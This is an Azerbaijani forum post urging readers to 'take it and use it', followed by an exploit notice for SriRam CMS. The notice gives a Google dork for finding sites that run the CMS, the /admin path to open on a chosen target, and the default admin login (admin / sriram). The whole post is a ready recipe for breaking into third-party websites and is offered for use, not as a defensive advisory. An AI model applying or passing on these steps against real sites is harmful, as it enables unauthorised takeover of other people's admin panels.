Salam uşaqlar.. Götürün işlədin.. Default admin passvord.. YƏni bu CMS `ı işlədən saytların çocunda şifrə budur : sriram
Kod:
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title : SriRam Cms Bug
[+] Exploit Author : Danger Security Team
[+] Vendor Homepage : http://sriramsoft.com
[+] Date: 2015-07-29
[+] Google Dork : "Designed by : SriRam Soft Solutions Pvt. Ltd"
[+] Date:
[+] Tested On : Windows , Linux
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] And then choose a target and put this after url : /admin
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] And fill username and password like the information below :
[+] Username : admin
[+] Password : sriram
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] SPT : Ahoora Danger , Nima Danger , wild.soldier, all Member....
[+] Discovered by : Mehran_FLash
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]